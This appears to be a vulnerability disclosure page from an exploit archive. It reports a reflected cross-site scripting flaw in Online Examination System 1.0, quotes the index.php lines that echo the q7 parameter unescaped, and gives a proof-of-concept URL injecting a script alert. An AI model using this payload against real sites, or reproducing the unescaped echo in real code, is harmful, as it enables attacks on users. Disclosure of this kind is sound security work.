Online Examination System 1.0 Cross Site Scripting

2022.09.29

Credit: Yousef Alraddadi

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Online Examination System - Cross site scripting Reflected
# Google Dork: N/A
# Date: 2022-9-29
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0

Vulnerability Details
======================

Steps :

vulnerable code in file index.php

157 <?php if(@$_GET['q7'])
158 { echo'<p style="color:red;font-size:15px;">'.@$_GET['q7'];}?>

http://localhost/examination/index.php?q7=%22%3E%3Cscript%3Ealert(%22yousef%22);%3C/script%3E

inject payload parameter q7

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Online Examination System 1.0 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.